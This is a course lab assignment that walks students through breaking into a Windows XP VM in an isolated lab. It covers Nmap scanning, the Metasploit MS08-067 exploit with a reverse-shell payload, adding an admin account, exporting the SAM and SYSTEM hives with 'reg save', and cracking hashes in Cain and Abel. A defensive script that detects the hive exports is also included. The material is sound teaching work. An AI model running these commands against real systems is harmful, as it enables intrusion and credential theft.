Lab Assignment 5

This document outlines a group assignment focused on cracking passwords for Windows XP using penetration testing tools like Kali Linux and Metasploit. It includes detailed steps for downloading Windows XP, gathering system information, exploiting vulnerabilities, creating an administrator account, and using Cain and Abel to crack the password of a student account. The assignment emphasizes the importance of original work and requires screenshots as proof of completion for various tasks.

Uploaded by

riteshnarwade03

Cracking Password

Overview:
Operating systems store passwords as hashes. Applications such as Cain and Abel can
crack the passwords as long as the program can obtain the hashes. In this assignment, we use
penetration testing tools to break into Windows XP in our labs.
Answers to the questions must be in your own words. Don't copy from other sources.

Objective:
This assignment is a group assignment (however, all members must submit it separately). You
need to use your Kali Linux, Windows 10, and Windows XP VMs. Make sure every VM's network
adapter is set to Host Only.
You don't have any information about Windows XP. We try to gather information from Windows
XP and attack it via Metasploit using Kali Linux tools. By creating an account and setting it as an
"Administrator" member, you can log in to Windows XP with your account. You don't want to
change any account's password, so you want to crack the passwords.
Transfer the SAM and SYSTEM files to your Windows 10 VM and use Cain and Abel to crack the
passwords.

The Lab Activities


Part 1: Download Windows XP (OVA file)
1. Click on the link provided in the Assignment and download the Windows XP
2. Open your VMWare and click on Open Virtual Machine
3. Find the downloaded OVA file and input the information to import the image.

Part 2: Investigate the Windows XP and Load Windows Shell Reverse


You don't have any access to Windows XP. You must find what kind of service pack it has.
What is its IP address?
1. Use the Nmap command to find the Windows XP IP address. (Hint: search as Ping)
2. Use the Nmap command as an intense scan to find information about Windows XP.
(Hint: search for Operating System as single host)
3. Take a screenshot of the Windows XP information

Now you have all information you need to attack Windows XP.
Load Metasploit on your Kali Linux. You need to find some information about how to attack
Windows XP using the Metasploit framework:

1. Search Metasploit for ms08-067


Use the search command to check whether a Metasploit module is available for the vulnerability
in focus, which is ms08-067. Type the following command:

search ms08-067

2. Find more information about the module
To gather detailed information about the available Metasploit module for the
ms08-067 vulnerability, enter the following command in the Metasploit console:

info exploit/windows/smb/ms08_067_netapi

3. Select the ms08_067 module


Once we confirm the specific Metasploit module (exploit), we can execute the command
below to use the specific exploit available for the ms08-067 vulnerability.

use exploit/windows/smb/ms08_067_netapi

4. Setting up the Module Options


Once you have chosen a specific exploit, enter the following command to list all options
available for this exploit module.

show options

5. Setting RHOST to Target Windows XP VM IP Address


set RHOST [IP Address of Windows XP VM]

6. Selecting and using any of the compatible payloads for this exploit module
Now we can set the payload, let's say windows/shell_reverse_tcp, by using the command
below

set payload windows/shell_reverse_tcp

Q1- Why did you use payload? And why did you use shell_reverse_tcp?

7. Setting up Local Host, Kali Linux


Find the Kali Linux IP address. Now we need to set the LHOST option to the Kali Linux
IP address by using the command below:

set LHOST [Kali Linux IP Address]

Enter the following command to view the set options.

show options
(Take a screenshot)

8. Exploiting the Target with Metasploit


Now enter the exploit command in Metasploit. You should see the Windows XP command
prompt.

Part 3: Create an account with administrator privilege in the Windows XP

We didn't have any access to Windows XP. By using Metasploit, you now have access to
Windows XP. We need to create an account and add this account as a member of the
administrators' group. Use the Windows "net" command to add this account. (Search for the
command and find how to use it.) (Take a screenshot)
Now you have a username and password to log in to Windows XP.

Q2- How can you use the net command to show all local groups in Win XP?

Part 4: Crack the student account’s password


You have full access to Windows XP. You must find out the "student" account's password.
DON'T CHANGE THE "student" ACCOUNT'S PASSWORD.
Windows keeps passwords as NTLM hashes in the "SAM file".
The system file privileges are required to view passwords. Now you need to copy these files to
the Windows 10 VM. However, you can't copy these files from the directory
C:\Windows\System32\config.
To copy these files, you need to use the reg command to save them from the Windows
registry to files.
• Use these commands as follows:

reg save HKLM\sam c:\sam


reg save HKLM\system c:\system

Q3- What is HKLM, and why does Windows use it?
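
From the defender's side, the two reg save commands above are a well-defined detection point: exporting both the SAM and SYSTEM hives from one host gives an attacker everything needed for offline cracking, because the SYSTEM hive supplies the boot key. The following is an added example, not part of the original assignment; the log format (timestamp|host|command line), the host names and the 10-minute window are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (timestamp|host|command line); not real logs.
SAMPLE_LOG = [
    r"2024-05-01T10:02:11|XP-LAB|reg save HKLM\sam c:\sam",
    r'2024-05-01T10:02:40|XP-LAB|REG.EXE  SAVE "HKEY_LOCAL_MACHINE\SYSTEM" c:\system',
    r"2024-05-01T10:05:00|WS-07|reg save HKLM\Software\Vendor c:\backup.hiv",
    r"2024-05-01T11:30:00|WS-09|reg.exe save hklm\system d:\sys.bak",
    r"2024-05-01T12:00:00|WS-09|reg query HKLM\SAM",
]

# Matches "reg save" of the whole SAM or SYSTEM hive: case-insensitive, short or
# long root key name, optional quotes. A subkey such as HKLM\SYSTEM\... is not matched.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM)"?(?=\s|$)',
    re.IGNORECASE,
)

def parse(line):
    """Split one record of the assumed format into (datetime, host, command line)."""
    ts, host, cmd = line.split("|", 2)
    return datetime.fromisoformat(ts), host, cmd

def detect_hive_dumps(lines, window=timedelta(minutes=10)):
    """Return {host: severity} for hosts where credential hives were exported.

    "high"   = SAM and SYSTEM both saved within `window` (hashes plus boot key).
    "medium" = only one of the two hives seen, or the pair is further apart.
    """
    saves = {}  # host -> list of (timestamp, hive name)
    for line in lines:
        ts, host, cmd = parse(line)
        match = HIVE_SAVE.search(cmd)
        if match:
            saves.setdefault(host, []).append((ts, match.group(1).upper()))

    alerts = {}
    for host, events in saves.items():
        sam = [t for t, hive in events if hive == "SAM"]
        system = [t for t, hive in events if hive == "SYSTEM"]
        paired = any(abs(a - b) <= window for a in sam for b in system)
        alerts[host] = "high" if paired else "medium"
    return alerts

if __name__ == "__main__":
    for host, severity in detect_hive_dumps(SAMPLE_LOG).items():
        print(f"{severity.upper():6} {host}: registry credential hive export")
```
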

You need to transfer these files to your Windows 10 VM. You can:
• copy/paste them from Windows XP to Windows 10 VM
OR
• copy/paste them to your host OS (Windows or Mac) from XP, then copy/paste to
Windows 10 VM.
Now you need to import all XP accounts into the Cain and Abel program to crack the student
account's password. Follow these instructions to do it:
• Run Cain application
• Click on the Cracker tab
• Right-click on the cracker window and select Add to list from the menu (Or press Insert
key)
• Select "Import Hashes from a SAM database."
• Load the transferred sam file into this window
• Load the transferred system file into the Boot Key (HEX) box, and it will provide a hex code.
• Copy the hex code that you get and paste it into the text box of Boot Key (HEX).
• Click on Next and see all Win XP accounts with their hashes.
• Use a Bruteforce attack and the following Win XP password policy to crack the student's
password.
o You need to check the Local Security Policy to find out the Win XP password
settings. (Control Panel, Administrative Tools, Local Security Policy)
o If you set Bruteforce settings properly, your password cracking will take 5 to 12
minutes.
o If it takes more than 12 minutes, recheck your settings.
o Take a screenshot of the result.

Now log in to Windows XP with the student account and do the following to prove your work:
• Use CMD or Paint to write your names on it.
• Don't change the background.
• Take a screenshot

Lab Report Write-up


Submit your lab results using the template provided for las.
